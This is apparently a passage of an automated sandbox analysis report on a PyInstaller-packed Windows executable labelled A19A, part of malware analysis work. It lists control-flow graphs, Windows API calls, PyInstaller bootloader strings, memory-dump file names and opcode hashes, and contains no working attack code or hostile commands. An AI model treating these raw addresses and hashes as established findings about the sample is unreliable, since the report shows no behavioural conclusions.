7ff6e1b33a6f-7ff6e1b33a72 call 7ff6e1b36cc0 518->524 523->404 524->523
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B33BC0: GetModuleFileNameW.KERNEL32(?,00007FF6E1B336B9), ref: 00007FF6E1B33BF1
                                                                                                                                                                                                                                                                                                                                  • SetDllDirectoryW.KERNEL32 ref: 00007FF6E1B338C5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B369B0: GetEnvironmentVariableW.KERNEL32(00007FF6E1B33707), ref: 00007FF6E1B369EA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B369B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E1B36A07
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                                                                                                                                  • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2344891160-3602715111
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d67fe7c05d3d42b3001c2b4170c228036023caaf2f40bab04b522c680e5dc54a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4943fa41ea965914a25092428d2958acd32e9be4173d680bf5c0814de9ef9326
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d67fe7c05d3d42b3001c2b4170c228036023caaf2f40bab04b522c680e5dc54a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DB1B713A1C54383FB25AB21D4583FE3251BF46B84F406131E94DC7696EFAEE526E30A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 528 7ff6e1b31050-7ff6e1b310ab call 7ff6e1b3a640 531 7ff6e1b310ad-7ff6e1b310d2 call 7ff6e1b32770 528->531 532 7ff6e1b310d3-7ff6e1b310eb call 7ff6e1b440e0 528->532 537 7ff6e1b31109-7ff6e1b31119 call 7ff6e1b440e0 532->537 538 7ff6e1b310ed-7ff6e1b31104 call 7ff6e1b324d0 532->538 543 7ff6e1b31137-7ff6e1b31147 537->543 544 7ff6e1b3111b-7ff6e1b31132 call 7ff6e1b324d0 537->544 545 7ff6e1b3126c-7ff6e1b31281 call 7ff6e1b3a320 call 7ff6e1b440cc * 2 538->545 547 7ff6e1b31150-7ff6e1b31175 call 7ff6e1b3f62c 543->547 544->545 561 7ff6e1b31286-7ff6e1b312a0 545->561 554 7ff6e1b3117b-7ff6e1b31185 call 7ff6e1b3f3a0 547->554 555 7ff6e1b3125e 547->555 554->555 562 7ff6e1b3118b-7ff6e1b31197 554->562 557 7ff6e1b31264 555->557 557->545 563 7ff6e1b311a0-7ff6e1b311c8 call 7ff6e1b38a90 562->563 566 7ff6e1b311ca-7ff6e1b311cd 563->566 567 7ff6e1b31241-7ff6e1b3125c call 7ff6e1b32770 563->567 569 7ff6e1b3123c 566->569 570 7ff6e1b311cf-7ff6e1b311d9 566->570 567->557 569->567 571 7ff6e1b311db-7ff6e1b311e8 call 7ff6e1b3fd6c 570->571 572 7ff6e1b31203-7ff6e1b31206 570->572 577 7ff6e1b311ed-7ff6e1b311f0 571->577 575 7ff6e1b31208-7ff6e1b31216 call 7ff6e1b3bb90 572->575 576 7ff6e1b31219-7ff6e1b3121e 572->576 575->576 576->563 579 7ff6e1b31220-7ff6e1b31223 576->579 580 7ff6e1b311fe-7ff6e1b31201 577->580 581 7ff6e1b311f2-7ff6e1b311fc call 7ff6e1b3f3a0 577->581 583 7ff6e1b31237-7ff6e1b3123a 579->583 584 7ff6e1b31225-7ff6e1b31228 579->584 580->567 581->576 581->580 583->557 584->567 586 7ff6e1b3122a-7ff6e1b31232 584->586 586->547
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                                                  • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-1655038675
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 609a4ae9e3142b70f2d2471d26a079b0dbe6029478b7fa52329abca79a32aa01
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c34fa1a1792e22a10aa46f35f520a744385353a33fd9a4e6ef36ce62ef6ec0db
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 609a4ae9e3142b70f2d2471d26a079b0dbe6029478b7fa52329abca79a32aa01
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74510763A08642C2EB209B11E4443BA7395FB86794F446131EE4DC7785EF7EE426E70A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 659 7ff6e1b4af5c-7ff6e1b4af82 660 7ff6e1b4af9d-7ff6e1b4afa1 659->660 661 7ff6e1b4af84-7ff6e1b4af98 call 7ff6e1b44454 call 7ff6e1b44474 659->661 663 7ff6e1b4b377-7ff6e1b4b383 call 7ff6e1b44454 call 7ff6e1b44474 660->663 664 7ff6e1b4afa7-7ff6e1b4afae 660->664 677 7ff6e1b4b38e 661->677 680 7ff6e1b4b389 call 7ff6e1b49de0 663->680 664->663 666 7ff6e1b4afb4-7ff6e1b4afe2 664->666 666->663 669 7ff6e1b4afe8-7ff6e1b4afef 666->669 672 7ff6e1b4b008-7ff6e1b4b00b 669->672 673 7ff6e1b4aff1-7ff6e1b4b003 call 7ff6e1b44454 call 7ff6e1b44474 669->673 675 7ff6e1b4b373-7ff6e1b4b375 672->675 676 7ff6e1b4b011-7ff6e1b4b017 672->676 673->680 681 7ff6e1b4b391-7ff6e1b4b3a8 675->681 676->675 682 7ff6e1b4b01d-7ff6e1b4b020 676->682 677->681 680->677 682->673 686 7ff6e1b4b022-7ff6e1b4b047 682->686 688 7ff6e1b4b07a-7ff6e1b4b081 686->688 689 7ff6e1b4b049-7ff6e1b4b04b 686->689 690 7ff6e1b4b056-7ff6e1b4b06d call 7ff6e1b44454 call 7ff6e1b44474 call 7ff6e1b49de0 688->690 691 7ff6e1b4b083-7ff6e1b4b0ab call 7ff6e1b4cafc call 7ff6e1b49e48 * 2 688->691 692 7ff6e1b4b04d-7ff6e1b4b054 689->692 693 7ff6e1b4b072-7ff6e1b4b078 689->693 725 7ff6e1b4b200 690->725 720 7ff6e1b4b0ad-7ff6e1b4b0c3 call 7ff6e1b44474 call 7ff6e1b44454 691->720 721 7ff6e1b4b0c8-7ff6e1b4b0f3 call 7ff6e1b4b784 691->721 692->690 692->693 694 7ff6e1b4b0f8-7ff6e1b4b10f 693->694 697 7ff6e1b4b18a-7ff6e1b4b194 call 7ff6e1b52a6c 694->697 698 7ff6e1b4b111-7ff6e1b4b119 694->698 711 7ff6e1b4b19a-7ff6e1b4b1af 697->711 712 7ff6e1b4b21e 697->712 698->697 701 7ff6e1b4b11b-7ff6e1b4b11d 698->701 701->697 705 7ff6e1b4b11f-7ff6e1b4b135 701->705 705->697 709 7ff6e1b4b137-7ff6e1b4b143 705->709 709->697 714 7ff6e1b4b145-7ff6e1b4b147 709->714 711->712 717 7ff6e1b4b1b1-7ff6e1b4b1c3 GetConsoleMode 711->717 716 7ff6e1b4b223-7ff6e1b4b243 ReadFile 712->716 714->697 719 7ff6e1b4b149-7ff6e1b4b161 714->719 722 7ff6e1b4b33d-7ff6e1b4b346 GetLastError 716->722 723 7ff6e1b4b249-7ff6e1b4b251 716->723 717->712 724 7ff6e1b4b1c5-7ff6e1b4b1cd 717->724 719->697 730 7ff6e1b4b163-7ff6e1b4b16f 719->730 720->725 721->694 727 7ff6e1b4b348-7ff6e1b4b35e call 7ff6e1b44474 call 7ff6e1b44454 722->727 728 7ff6e1b4b363-7ff6e1b4b366 722->728 723->722 732 7ff6e1b4b257 723->732 724->716 726 7ff6e1b4b1cf-7ff6e1b4b1f1 ReadConsoleW 724->726 729 7ff6e1b4b203-7ff6e1b4b20d call 7ff6e1b49e48 725->729 734 7ff6e1b4b212-7ff6e1b4b21c 726->734 735 7ff6e1b4b1f3 GetLastError 726->735 727->725 739 7ff6e1b4b36c-7ff6e1b4b36e 728->739 740 7ff6e1b4b1f9-7ff6e1b4b1fb call 7ff6e1b443e8 728->740 729->681 730->697 738 7ff6e1b4b171-7ff6e1b4b173 730->738 742 7ff6e1b4b25e-7ff6e1b4b273 732->742 734->742 735->740 738->697 747 7ff6e1b4b175-7ff6e1b4b185 738->747 739->729 740->725 742->729 749 7ff6e1b4b275-7ff6e1b4b280 742->749 747->697 752 7ff6e1b4b2a7-7ff6e1b4b2af 749->752 753 7ff6e1b4b282-7ff6e1b4b29b call 7ff6e1b4ab74 749->753 755 7ff6e1b4b32b-7ff6e1b4b338 call 7ff6e1b4a9b4 752->755 756 7ff6e1b4b2b1-7ff6e1b4b2c3 752->756 759 7ff6e1b4b2a0-7ff6e1b4b2a2 753->759 755->759 760 7ff6e1b4b2c5 756->760 761 7ff6e1b4b31e-7ff6e1b4b326 756->761 759->729 763 7ff6e1b4b2ca-7ff6e1b4b2d1 760->763 761->729 764 7ff6e1b4b30d-7ff6e1b4b318 763->764 765 7ff6e1b4b2d3-7ff6e1b4b2d7 763->765 764->761 766 7ff6e1b4b2d9-7ff6e1b4b2e0 765->766 767 7ff6e1b4b2f3 765->767 766->767 768 7ff6e1b4b2e2-7ff6e1b4b2e6 766->768 769 7ff6e1b4b2f9-7ff6e1b4b309 767->769 768->767 770 7ff6e1b4b2e8-7ff6e1b4b2f1 768->770 769->763 771 7ff6e1b4b30b 769->771 770->769 771->761
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bb836f15fd7b84d0eab272938f235470d80225e915ddf6716f0527cb605fae18
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eded73ca504a88f54a32cd259a35afa1f85f7879cb6c81cbe2d403e6d602ab56
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb836f15fd7b84d0eab272938f235470d80225e915ddf6716f0527cb605fae18
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7C1F32390C68691EB209B1595403BE3B61FB82B80F55A131DB4EC7791EF7EE447A70A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 849 7ff6e1b4c460-7ff6e1b4c485 850 7ff6e1b4c48b-7ff6e1b4c48e 849->850 851 7ff6e1b4c753 849->851 852 7ff6e1b4c4c7-7ff6e1b4c4f3 850->852 853 7ff6e1b4c490-7ff6e1b4c4c2 call 7ff6e1b49d14 850->853 854 7ff6e1b4c755-7ff6e1b4c765 851->854 856 7ff6e1b4c4f5-7ff6e1b4c4fc 852->856 857 7ff6e1b4c4fe-7ff6e1b4c504 852->857 853->854 856->853 856->857 859 7ff6e1b4c506-7ff6e1b4c50f call 7ff6e1b4b820 857->859 860 7ff6e1b4c514-7ff6e1b4c529 call 7ff6e1b52a6c 857->860 859->860 864 7ff6e1b4c643-7ff6e1b4c64c 860->864 865 7ff6e1b4c52f-7ff6e1b4c538 860->865 867 7ff6e1b4c64e-7ff6e1b4c654 864->867 868 7ff6e1b4c6a0-7ff6e1b4c6c5 WriteFile 864->868 865->864 866 7ff6e1b4c53e-7ff6e1b4c542 865->866 869 7ff6e1b4c553-7ff6e1b4c55e 866->869 870 7ff6e1b4c544-7ff6e1b4c54c call 7ff6e1b43a50 866->870 873 7ff6e1b4c68c-7ff6e1b4c69e call 7ff6e1b4bf18 867->873 874 7ff6e1b4c656-7ff6e1b4c659 867->874 871 7ff6e1b4c6c7-7ff6e1b4c6cd GetLastError 868->871 872 7ff6e1b4c6d0 868->872 878 7ff6e1b4c56f-7ff6e1b4c584 GetConsoleMode 869->878 879 7ff6e1b4c560-7ff6e1b4c569 869->879 870->869 871->872 881 7ff6e1b4c6d3 872->881 896 7ff6e1b4c630-7ff6e1b4c637 873->896 875 7ff6e1b4c65b-7ff6e1b4c65e 874->875 876 7ff6e1b4c678-7ff6e1b4c68a call 7ff6e1b4c138 874->876 882 7ff6e1b4c6e4-7ff6e1b4c6ee 875->882 883 7ff6e1b4c664-7ff6e1b4c676 call 7ff6e1b4c01c 875->883 876->896 886 7ff6e1b4c58a-7ff6e1b4c590 878->886 887 7ff6e1b4c63c 878->887 879->864 879->878 889 7ff6e1b4c6d8 881->889 890 7ff6e1b4c74c-7ff6e1b4c751 882->890 891 7ff6e1b4c6f0-7ff6e1b4c6f5 882->891 883->896 894 7ff6e1b4c596-7ff6e1b4c599 886->894 895 7ff6e1b4c619-7ff6e1b4c62b call 7ff6e1b4baa0 886->895 887->864 897 7ff6e1b4c6dd 889->897 890->854 898 7ff6e1b4c6f7-7ff6e1b4c6fa 891->898 899 7ff6e1b4c723-7ff6e1b4c72d 891->899 901 7ff6e1b4c59b-7ff6e1b4c59e 894->901 902 7ff6e1b4c5a4-7ff6e1b4c5b2 894->902 895->896 896->889 897->882 904 7ff6e1b4c6fc-7ff6e1b4c70b 898->904 905 7ff6e1b4c713-7ff6e1b4c71e call 7ff6e1b44430 898->905 906 7ff6e1b4c734-7ff6e1b4c743 899->906 907 7ff6e1b4c72f-7ff6e1b4c732 899->907 901->897 901->902 908 7ff6e1b4c5b4 902->908 909 7ff6e1b4c610-7ff6e1b4c614 902->909 904->905 905->899 906->890 907->851 907->906 911 7ff6e1b4c5b8-7ff6e1b4c5cf call 7ff6e1b52b38 908->911 909->881 915 7ff6e1b4c607-7ff6e1b4c60d GetLastError 911->915 916 7ff6e1b4c5d1-7ff6e1b4c5dd 911->916 915->909 917 7ff6e1b4c5fc-7ff6e1b4c603 916->917 918 7ff6e1b4c5df-7ff6e1b4c5f1 call 7ff6e1b52b38 916->918 917->909 920 7ff6e1b4c605 917->920 918->915 922 7ff6e1b4c5f3-7ff6e1b4c5fa 918->922 920->911 922->917
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E1B4C44B), ref: 00007FF6E1B4C57C
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6E1B4C44B), ref: 00007FF6E1B4C607
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c9562be74e3e011b14f36cc2d5f23b575e471fae160cb885922e2a719cf7448
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a1ee1962f3648b0462d0de8378a2e2904c2c2ef953c6ca84061085a4037d78ae
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c9562be74e3e011b14f36cc2d5f23b575e471fae160cb885922e2a719cf7448
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E91C623E1865185F750DF65944037D3BA0BB06F88F94A139DE0E97694EF3AE443E70A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8bf97934fac92d6cf6f5aeec7a7ab7ef5245e80df15cb27ed03d14056eff3848
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 693b0d18be512a6ae52f6d0d8ed5e4100b0adea8db8cff13b5d23d60ec96b4e9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bf97934fac92d6cf6f5aeec7a7ab7ef5245e80df15cb27ed03d14056eff3848
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD51E373F042218AFB14CB6499857BC37A1BB16368F10A135DE1ED6AE5EF3DA4039606
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
